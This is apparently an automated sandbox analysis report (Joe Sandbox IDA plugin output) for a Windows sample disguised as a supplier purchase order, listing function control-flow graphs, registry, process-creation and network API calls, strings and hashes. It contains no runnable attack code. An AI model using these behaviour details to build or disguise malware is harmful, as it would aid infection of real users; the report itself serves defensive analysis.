                                                                                                                                  control_flow_graph 782 f0352a-f03569 call ead3d2 * 3 789 f03574-f035e7 call ea84a6 call f03d7b call f03af7 782->789 790 f0356b-f0356e 782->790 804 f03612-f03617 789->804 805 f035e9-f035f4 call eed7e4 789->805 790->789 792 f035f9-f0360d call eb2570 790->792 798 f03a94-f03ab7 call ea5cd3 * 3 792->798 808 f03619-f0362e RegConnectRegistryW 804->808 809 f0366d 804->809 805->792 812 f03630-f03662 call ea7ba9 call eed7e4 call eb2570 808->812 813 f03667-f0366b 808->813 811 f03671-f0369c RegCreateKeyExW 809->811 815 f036e7-f036ec 811->815 816 f0369e-f036d2 call ea7ba9 call eed7e4 call eb2570 811->816 812->798 813->811 818 f036f2-f03715 call ea84a6 call ec1bc7 815->818 819 f03a7b-f03a8c RegCloseKey 815->819 816->798 840 f036d8-f036e2 RegCloseKey 816->840 835 f03796-f037b6 call ea84a6 call ec1bc7 818->835 836 f03717-f0376d call ea84a6 call ec18fb call ea84a6 * 2 RegSetValueExW 818->836 819->798 822 f03a8e-f03a92 RegCloseKey 819->822 822->798 847 f03840-f03860 call ea84a6 call ec1bc7 835->847 848 f037bc-f03814 call ea84a6 call ec18fb call ea84a6 * 2 RegSetValueExW 835->848 836->819 861 f03773-f03791 call ea7ba9 call eb2570 836->861 840->798 862 f03866-f038c9 call ea84a6 call ec010a call ea84a6 call ea3b1e 847->862 863 f03949-f03969 call ea84a6 call ec1bc7 847->863 848->819 878 f0381a-f0383b call ea7ba9 call eb2570 848->878 879 f03a74 861->879 898 f038e9-f03918 call ea84a6 RegSetValueExW 862->898 899 f038cb-f038d0 862->899 884 f039c6-f039e6 call ea84a6 call ec1bc7 863->884 885 f0396b-f0398b call eacdb4 call ea84a6 863->885 878->819 879->819 904 f03a13-f03a30 call ea84a6 call ec1bc7 884->904 905 f039e8-f03a0e call ead00b call ea84a6 884->905 907 f0398d-f039a1 RegSetValueExW 885->907 917 f0391a-f03936 call ea7ba9 call eb2570 898->917 918 f0393d-f03944 call ec017e 898->918 902 f038d2-f038d4 899->902 903 f038d8-f038db 899->903 902->903 903->899 908 f038dd-f038df 903->908 929 f03a32-f03a60 call eebe47 call ea84a6 call eebe8a 904->929 930 f03a67-f03a71 call eb2570 904->930 905->907 907->819 912 f039a7-f039c1 call ea7ba9 call eb2570 907->912 908->898 915 f038e1-f038e5 908->915 912->879 915->898 917->918 918->819 929->930 930->879
                                                                                                                                  APIs
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F03626
                                                                                                                                  • RegCreateKeyExW.KERNEL32(?,?,00000000,00F3DBF0,00000000,?,00000000,?,?), ref: 00F03694
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F036DC
                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F03765
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00F03A85
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F03A92
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                  • API String ID: 536824911-966354055
                                                                                                                                  • Opcode ID: 0db6f18d38c1f55a19f296034c20f563a12417f244f9720a050fc3761410f7d3
                                                                                                                                  • Instruction ID: d04f9da58f898b3f02872938b378c2e85e5b9819759f1a0df4075bb1f853f6d3
                                                                                                                                  • Opcode Fuzzy Hash: 0db6f18d38c1f55a19f296034c20f563a12417f244f9720a050fc3761410f7d3
                                                                                                                                  • Instruction Fuzzy Hash: 100258756006119FCB14EF24C995E2AB7E9FF89320F04845DF99AAB2A2DB34FD01DB41
                                                                                                                                  Function 00EA4257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe,00000104,?,00000000,00000001,00000000), ref: 00EA428C
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                    • Part of subcall function 00EC1BC7: __wcsicmp_l.LIBCMT ref: 00EC1C50
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EA43C0
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00F1214E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe$CMDLINE$CMDLINERAW
                                                                                                                                  • API String ID: 861526374-4276960765
                                                                                                                                  • Opcode ID: 51cd8576eb7df9ed8f2c334259d15ab184f5b5cb4ce9f64d248234d2a3fe2942
                                                                                                                                  • Instruction ID: 1482936000288b49d3a0fc571ac35f3604306a2262e223301ec756dd5dc415a1
                                                                                                                                  • Opcode Fuzzy Hash: 51cd8576eb7df9ed8f2c334259d15ab184f5b5cb4ce9f64d248234d2a3fe2942
                                                                                                                                  • Instruction Fuzzy Hash: E2816372800119AACB05EBE0DD52EEFB7FCAF5A360F141019F551BB091EBA07B49DB61
                                                                                                                                  Function 00EBE975 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 170COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00EBEA39
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00EBEA56
                                                                                                                                    • Part of subcall function 00EC297D: __wsplitpath_helper.LIBCMT ref: 00EC29BD
                                                                                                                                  • _wcsncat.LIBCMT ref: 00EBEA69
                                                                                                                                  • __makepath.LIBCMT ref: 00EBEA85
                                                                                                                                    • Part of subcall function 00EC2BFF: __wmakepath_s.LIBCMT ref: 00EC2C13
                                                                                                                                    • Part of subcall function 00EC010A: std::exception::exception.LIBCMT ref: 00EC013E
                                                                                                                                    • Part of subcall function 00EC010A: __CxxThrowException@8.LIBCMT ref: 00EC0153
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EBEABE
                                                                                                                                    • Part of subcall function 00EBEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00EBEADA,?,?), ref: 00EBEB27
                                                                                                                                  • _wcscat.LIBCMT ref: 00F132FC
                                                                                                                                  • _wcscat.LIBCMT ref: 00F13334
                                                                                                                                  • _wcsncpy.LIBCMT ref: 00F13370
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                                  • String ID: '/$Include$\
                                                                                                                                  • API String ID: 1213536620-683337311
                                                                                                                                  • Opcode ID: 9566ce6fd3929512a7361a716c26703a888a3a0074a1d1bd83d669a9ecccdbd4
                                                                                                                                  • Instruction ID: 96a0233b2055b66e8dbedd25460c6484311b9148f8995c3b65898c58de9af3a0
                                                                                                                                  • Opcode Fuzzy Hash: 9566ce6fd3929512a7361a716c26703a888a3a0074a1d1bd83d669a9ecccdbd4
                                                                                                                                  • Instruction Fuzzy Hash: 1C51DFB24047489BC354EF64ED92C9BB7E8FB4D300F40092EF56593261EBB49648EB66
                                                                                                                                  Function 00EE78EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1143 ee78ee-ee7911 WSAStartup 1144 ee7917-ee7938 gethostname gethostbyname 1143->1144 1145 ee79b1-ee79bd call ec1943 1143->1145 1144->1145 1147 ee793a-ee7941 1144->1147 1154 ee79be-ee79c1 1145->1154 1148 ee794e-ee7950 1147->1148 1149 ee7943 1147->1149 1152 ee7952-ee795f call ec1943 1148->1152 1153 ee7961-ee79a6 call ebfaa0 inet_ntoa call ec3220 call ee8553 call ec1943 call ec017e 1148->1153 1151 ee7945-ee794c 1149->1151 1151->1148 1151->1151 1159 ee79a9-ee79af WSACleanup 1152->1159 1153->1159 1159->1154
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                  • API String ID: 208665112-3771769585
                                                                                                                                  • Opcode ID: ce201ec41064b95e8cb218bd6e35840ab78d631e69a9292f8ceb7d29aca6dc63
                                                                                                                                  • Instruction ID: 799eee68151437cba3196400bb493ad670467188d7d57ff8c088ca134234e258
                                                                                                                                  • Opcode Fuzzy Hash: ce201ec41064b95e8cb218bd6e35840ab78d631e69a9292f8ceb7d29aca6dc63
                                                                                                                                  • Instruction Fuzzy Hash: F011273190811DAFCB34A7719C45FDA77ACDF81720F1110A9F485B2092FF75DA8296A0
                                                                                                                                  Function 00EA30A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00EA30B0
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00EA30BF
                                                                                                                                  • LoadIconW.USER32(00000063), ref: 00EA30D5
                                                                                                                                  • LoadIconW.USER32(000000A4), ref: 00EA30E7
                                                                                                                                  • LoadIconW.USER32(000000A2), ref: 00EA30F9
                                                                                                                                    • Part of subcall function 00EA318A: LoadImageW.USER32(00EA0000,00000063,00000001,00000010,00000010,00000000), ref: 00EA31AE
                                                                                                                                  • RegisterClassExW.USER32(?), ref: 00EA3167
                                                                                                                                    • Part of subcall function 00EA2F58: GetSysColorBrush.USER32(0000000F), ref: 00EA2F8B
                                                                                                                                    • Part of subcall function 00EA2F58: RegisterClassExW.USER32(00000030), ref: 00EA2FB5
                                                                                                                                    • Part of subcall function 00EA2F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00EA2FC6
                                                                                                                                    • Part of subcall function 00EA2F58: LoadIconW.USER32(000000A9), ref: 00EA3009
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                                  • API String ID: 2880975755-4155596026
                                                                                                                                  • Opcode ID: a12c3cb144254dfca356508638a95d93a40a7ccc9dfe0c4cc94433c006ad730c
                                                                                                                                  • Instruction ID: 4f55675c7983a269bb85ac86f6c4d8e09204cf517c15cbcf69632805bb99e37b
                                                                                                                                  • Opcode Fuzzy Hash: a12c3cb144254dfca356508638a95d93a40a7ccc9dfe0c4cc94433c006ad730c
                                                                                                                                  • Instruction Fuzzy Hash: 0C2171B0D0030CAFDB10DFA9EC0AA99BFF9FB49310F04412AE224E72A0D3B55540AF91
                                                                                                                                  Function 00EFB74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1342 efb74b-efb7ac VariantInit call eaca8e CoInitialize 1345 efb7ae CoUninitialize 1342->1345 1346 efb7b4-efb7c7 call ebd5f6 1342->1346 1345->1346 1349 efb7c9-efb7d0 call eaca8e 1346->1349 1350 efb7d5-efb7dc 1346->1350 1349->1350 1351 efb7de-efb805 call ea84a6 call eda857 1350->1351 1352 efb81b-efb85b call ea84a6 call ebf885 1350->1352 1351->1352 1362 efb807-efb816 call efc235 1351->1362 1363 efb9d3-efba17 SetErrorMode CoGetInstanceFromFile 1352->1363 1364 efb861-efb86e 1352->1364 1381 efbad0-efbae3 VariantClear 1362->1381 1365 efba1f-efba3a CoGetObject 1363->1365 1366 efba19-efba1d 1363->1366 1368 efb8a8-efb8b6 GetRunningObjectTable 1364->1368 1369 efb870-efb881 call ebd5f6 1364->1369 1372 efba3c 1365->1372 1373 efbab5-efbac5 call efc235 SetErrorMode 1365->1373 1371 efba40-efba47 SetErrorMode 1366->1371 1375 efb8b8-efb8c9 1368->1375 1376 efb8d5-efb8e8 call efc235 1368->1376 1383 efb883-efb88d call eacdb4 1369->1383 1384 efb8a0 1369->1384 1380 efba4b-efba51 1371->1380 1372->1371 1389 efbac7-efbacb call ea5cd3 1373->1389 1393 efb8ed-efb8fc 1375->1393 1394 efb8cb-efb8d0 1375->1394 1376->1389 1386 efbaa8-efbaab 1380->1386 1387 efba53-efba55 1380->1387 1383->1384 1401 efb88f-efb89e call eacdb4 1383->1401 1384->1368 1386->1373 1391 efba8d-efbaa6 call eea6f6 1387->1391 1392 efba57-efba78 call edac4b 1387->1392 1389->1381 1391->1389 1392->1391 1404 efba7a-efba83 1392->1404 1400 efb907-efb91b 1393->1400 1394->1376 1407 efb9bb-efb9d1 1400->1407 1408 efb921-efb925 1400->1408 1401->1368 1404->1391 1407->1380 1408->1407 1410 efb92b-efb940 1408->1410 1414 efb9a2-efb9ac 1410->1414 1415 efb942-efb957 1410->1415 1414->1400 1415->1414 1418 efb959-efb983 call edac4b 1415->1418 1422 efb985-efb98d 1418->1422 1423 efb994-efb99e 1418->1423 1424 efb98f-efb990 1422->1424 1425 efb9b1-efb9b6 1422->1425 1423->1414 1424->1423 1425->1407
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00EFB777
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00EFB7A4
                                                                                                                                  • CoUninitialize.COMBASE ref: 00EFB7AE
                                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00EFB8AE
                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EFB9DB
                                                                                                                                  • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 00EFBA0F
                                                                                                                                  • CoGetObject.OLE32(?,00000000,00F2D91C,?), ref: 00EFBA32
                                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00EFBA45
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EFBAC5
                                                                                                                                  • VariantClear.OLEAUT32(00F2D91C), ref: 00EFBAD5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2395222682-0
                                                                                                                                  • Opcode ID: 6dc0678182293c917604c244841ccea436432112cf667a5ca777d98a69f06806
                                                                                                                                  • Instruction ID: ae5ad86c9e5086de44df58fc6d38cac1ebaeb7d27b4839a02853452ce526b4ce
                                                                                                                                  • Opcode Fuzzy Hash: 6dc0678182293c917604c244841ccea436432112cf667a5ca777d98a69f06806
                                                                                                                                  • Instruction Fuzzy Hash: 4BC14671608349AFC704DF64C88496BB7E9FF88348F14591DF68AAB251DB70ED05CB52
                                                                                                                                  Function 00EA2F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00EA2F8B
                                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 00EA2FB5
                                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00EA2FC6
                                                                                                                                  • LoadIconW.USER32(000000A9), ref: 00EA3009
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                  • API String ID: 975902462-1005189915
                                                                                                                                  • Opcode ID: a6ba5c6b3a1e752fbdcc924a1d464f8a84f558587193f2f72c15945440faa551
                                                                                                                                  • Instruction ID: 96706eddca39c43136ba2dddc588faab717c4a42f5c1be7c89cb7a00c2dd88a3
                                                                                                                                  • Opcode Fuzzy Hash: a6ba5c6b3a1e752fbdcc924a1d464f8a84f558587193f2f72c15945440faa551
                                                                                                                                  • Instruction Fuzzy Hash: B421BFB590031CAFDB10DFA4E889BCEBBF4FB09701F14411AF625A62A0D7B54545EF91
                                                                                                                                  Function 00F023C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1431 f023c5-f02426 call ec1970 1434 f02452-f02456 1431->1434 1435 f02428-f0243b call eacdb4 1431->1435 1437 f02458-f02468 call eacdb4 1434->1437 1438 f0249d-f024a3 1434->1438 1443 f02488 1435->1443 1444 f0243d-f02450 call eacdb4 1435->1444 1453 f0246b-f02484 call eacdb4 1437->1453 1440 f024a5-f024a8 1438->1440 1441 f024b8-f024be 1438->1441 1445 f024ab-f024b0 call eacdb4 1440->1445 1446 f024c0 1441->1446 1447 f024c8-f024e2 call ea84a6 call ea3bcf 1441->1447 1449 f0248b-f0248f 1443->1449 1444->1453 1445->1441 1446->1447 1464 f025a1-f025a9 1447->1464 1465 f024e8-f02541 call ea84a6 call ea3bcf call ea84a6 call ea3bcf call ea84a6 call ea3bcf 1447->1465 1456 f02491-f02497 1449->1456 1457 f02499-f0249b 1449->1457 1453->1438 1463 f02486 1453->1463 1456->1445 1457->1438 1457->1441 1463->1449 1467 f025d3-f02601 GetCurrentDirectoryW call ec010a GetCurrentDirectoryW 1464->1467 1468 f025ab-f025c6 call ea84a6 call ea3bcf 1464->1468 1510 f02543-f0255e call ea84a6 call ea3bcf 1465->1510 1511 f0256f-f0259f GetSystemDirectoryW call ec010a GetSystemDirectoryW 1465->1511 1476 f02605 1467->1476 1468->1467 1481 f025c8-f025d1 call ec18fb 1468->1481 1480 f02609-f0260d 1476->1480 1483 f0263e-f0264e call ee9a8f 1480->1483 1484 f0260f-f02639 call eaca8e * 3 1480->1484 1481->1467 1481->1483 1493 f02650-f0269b call eea17a call eea073 call eea102 1483->1493 1494 f026aa 1483->1494 1484->1483 1498 f026ac-f026bb 1493->1498 1529 f0269d-f026a8 1493->1529 1494->1498 1502 f026c1-f026f1 call edbc90 call ec18fb 1498->1502 1503 f0274c-f02768 CreateProcessW 1498->1503 1525 f026f3-f026f8 1502->1525 1526 f026fa-f0270a call ec18fb 1502->1526 1506 f0276b-f0277e call ec017e * 2 1503->1506 1532 f02780-f027b8 call eed7e4 GetLastError call ea7ba9 call eb2570 1506->1532 1533 f027bd-f027c9 CloseHandle 1506->1533 1510->1511 1535 f02560-f02569 call ec18fb 1510->1535 1511->1476 1525->1525 1525->1526 1540 f02713-f02723 call ec18fb 1526->1540 1541 f0270c-f02711 1526->1541 1529->1498 1549 f0283e-f0284f call ee9b29 1532->1549 1537 f027f5-f027f9 1533->1537 1538 f027cb-f027f0 call ee9d09 call eea37f call f02881 1533->1538 1535->1480 1535->1511 1543 f02807-f02811 1537->1543 1544 f027fb-f02805 1537->1544 1538->1537 1559 f02725-f0272a 1540->1559 1560 f0272c-f0274a call ec017e * 3 1540->1560 1541->1540 1541->1541 1550 f02813 1543->1550 1551 f02819-f02838 call eb2570 CloseHandle 1543->1551 1544->1549 1550->1551 1551->1549 1559->1559 1559->1560 1560->1506
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00F023E6
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F02579
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F0259D
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F025DD
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F025FF
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F02760
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F02792
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00F027C1
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00F02838
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
